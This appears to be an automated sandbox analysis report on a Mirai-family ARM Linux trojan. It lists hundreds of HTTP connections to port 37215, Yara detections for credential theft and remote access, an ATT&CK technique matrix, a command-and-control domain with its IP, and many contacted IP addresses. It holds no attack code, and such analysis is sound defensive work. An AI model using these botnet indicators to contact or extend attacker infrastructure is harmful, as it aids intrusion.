          Source: unknownNetwork traffic detected: HTTP traffic on port 40622 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37260 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35984 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41842 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48792 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52566 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35868 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42432 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46886 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55744 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59904 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41678 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48218 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35866 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35336 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33880 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53324 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36024 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45978 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43890 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55552 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34652 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53570 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41434 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41840 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45950 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51604 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35038 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39972 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56194 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46168 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35380 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49424 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33572 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35126 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41166 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48436 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58866 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35988 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45050 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55208 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53254 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34856 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56026 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36464 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44468 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40446 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46632 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48914 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53902 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54876 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58974 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54316 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52994 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38082 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32898 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38088 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38824 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39858 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56902 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47172 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46332 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52564 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37522 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47554 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56388 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38330 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56996 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37222 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55082 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41578 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40910 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36664 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44444 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42454 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60560 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32814 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47012 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56184 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57466 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44542 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48516 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56662 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47968 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46468 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59112 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37254 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40394 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55758 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45954 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39576 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54794 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60892 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43762 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43894 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39460 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54374 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34972 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43764 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34074 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42430 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42250 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55226 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53606 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60058 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43782 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49462 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43876 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40830 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52948 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59436 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56012 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40196 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39584 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57560 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58122 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41358 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60540 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47228 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33912 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54830 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46228 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58242 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59992 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54392 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45326 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41132 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33172 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55124 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39106 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37536 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56286 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54734 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51814 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53552 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41952 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37974 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54168 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34644 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41998 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49626 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53554 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57312 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38356 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34626 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38364 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56314 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52808 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38766 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39680 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32936 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40152 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48560 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44290 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35040 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47914 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38472 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43048 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58856 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48450 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39332 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36338 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38556 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58942 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48268 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60352 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48538 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57968 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44044 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47924 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47644 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43802 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44042 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54868 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46810 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55720 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44428 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38004 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35088 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34292 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44048 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46894 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46804 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43438 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52090 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44866 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35354 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56548 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36148 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59262 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58832 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55420 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44384 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52398 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49062 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43822 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41272 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33248 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34558 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43406 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35118 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42764 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52336 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34584 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55642 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36436 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58176 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43038 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60518 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53776 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58208 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49614 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48556 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39714 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45822 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59256 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43888 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39130 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57324 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43100 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52236 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57160 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35146 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48816 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55434 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42332 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49578 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37668 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54882 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48542 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45190 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45914 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46326 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60330 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59282 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33474 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40206 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35670 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52380 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59638 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43432 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52342 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54526 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37706 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43378 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41724 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58378 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41200 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54984 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35984 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36872 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44524 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58086 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54126 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33904 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48750 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45126 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51374 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46118 -> 37215
          Source: arm4.elfSubmission file: segment LOAD with 7.732 entropy (max. 8.0)
          Source: /tmp/arm4.elf (PID: 5678)Queries kernel information via 'uname': Jump to behavior
          Source: arm4.elf, 5678.1.00007fff7cc6f000.00007fff7cc90000.rw-.sdmp, arm4.elf, 5688.1.00007fff7cc6f000.00007fff7cc90000.rw-.sdmpBinary or memory string: btx86_64/usr/bin/qemu-arm/tmp/arm4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm4.elf
          Source: arm4.elf, 5678.1.000055659663b000.0000556596829000.rw-.sdmp, arm4.elf, 5688.1.000055659663b000.0000556596829000.rw-.sdmpBinary or memory string: eU!/etc/qemu-binfmt/arm
          Source: arm4.elf, 5678.1.000055659663b000.0000556596829000.rw-.sdmp, arm4.elf, 5688.1.000055659663b000.0000556596829000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
          Source: arm4.elf, 5678.1.00007fff7cc6f000.00007fff7cc90000.rw-.sdmp, arm4.elf, 5688.1.00007fff7cc6f000.00007fff7cc90000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 5678.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 5688.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: arm4.elf PID: 5678, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: arm4.elf PID: 5688, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 5678.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 5688.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: arm4.elf PID: 5678, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: arm4.elf PID: 5688, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception11
          Obfuscated Files or Information
          OS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System11
          Non-Standard Port
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1454029 Sample: arm4.elf Startdate: 08/06/2024 Architecture: LINUX Score: 92 18 41.114.147.148 MTNNS-ASZA South Africa 2->18 20 41.157.30.71 CELL-CZA South Africa 2->20 22 99 other IPs or domains 2->22 24 Snort IDS alert for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 4 other signatures 2->30 8 arm4.elf 2->8         started        signatures3 process4 process5 10 arm4.elf 8->10         started        process6 12 arm4.elf 10->12         started        14 arm4.elf 10->14         started        16 arm4.elf 10->16         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          arm4.elf24%ReversingLabsLinux.Trojan.Mirai
          No Antivirus matches
          SourceDetectionScannerLabelLink
          retardedclassmate.dyn8%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://upx.sf.net0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/envelope/0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/soap/encoding/0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/soap/envelope/0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          retardedclassmate.dyn
          89.32.41.31
          truefalseunknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://upx.sf.netarm4.elftrue
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/soap/encoding/arm4.elf, 5688.1.00007f042c017000.00007f042c036000.r-x.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/soap/envelope/arm4.elf, 5688.1.00007f042c017000.00007f042c036000.r-x.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          197.40.144.194
          unknownEgypt
          8452TE-ASTE-ASEGfalse
          41.92.37.112
          unknownMorocco
          36925ASMediMAfalse
          156.139.26.114
          unknownUnited States
          3356LEVEL3USfalse
          41.127.73.187
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          156.246.150.166
          unknownSeychelles
          328608Africa-on-Cloud-ASZAfalse
          156.61.32.101
          unknownUnited Kingdom
          39400LBH-ASCountyCouncilGBfalse
          156.249.107.15
          unknownSeychelles
          139086ONL-HKOCEANNETWORKLIMITEDHKfalse
          156.234.199.254
          unknownSeychelles
          136800XIAOZHIYUN1-AS-APICIDCNETWORKUSfalse
          41.102.150.103
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          156.68.4.37
          unknownUnited States
          297AS297USfalse
          41.239.218.46
          unknownEgypt
          8452TE-ASTE-ASEGfalse
          41.165.218.93
          unknownSouth Africa
          36937Neotel-ASZAfalse
          41.102.161.68
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          41.122.213.68
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          41.82.47.212
          unknownSenegal
          8346SONATEL-ASAutonomousSystemEUfalse
          156.49.135.47
          unknownSweden
          29975VODACOM-ZAfalse
          41.140.123.146
          unknownMorocco
          36903MT-MPLSMAfalse
          41.140.123.148
          unknownMorocco
          36903MT-MPLSMAfalse
          41.114.147.148
          unknownSouth Africa
          16637MTNNS-ASZAtrue
          41.252.72.3
          unknownLibyan Arab Jamahiriya
          21003GPTC-ASLYfalse
          197.19.253.196
          unknownTunisia
          37693TUNISIANATNfalse
          41.157.30.71
          unknownSouth Africa
          37168CELL-CZAtrue
          41.182.10.40
          unknownNamibia
          36996TELECOM-NAMIBIANAfalse
          156.79.242.106
          unknownUnited States
          11363FUJITSU-USAUSfalse
          41.169.49.14
          unknownSouth Africa
          36937Neotel-ASZAfalse
          197.224.41.156
          unknownMauritius
          23889MauritiusTelecomMUfalse
          41.54.139.198
          unknownSouth Africa
          37168CELL-CZAfalse
          41.214.230.2
          unknownMorocco
          36925ASMediMAfalse
          197.82.0.53
          unknownSouth Africa
          10474OPTINETZAfalse
          197.46.166.209
          unknownEgypt
          8452TE-ASTE-ASEGfalse
          197.163.1.32
          unknownEgypt
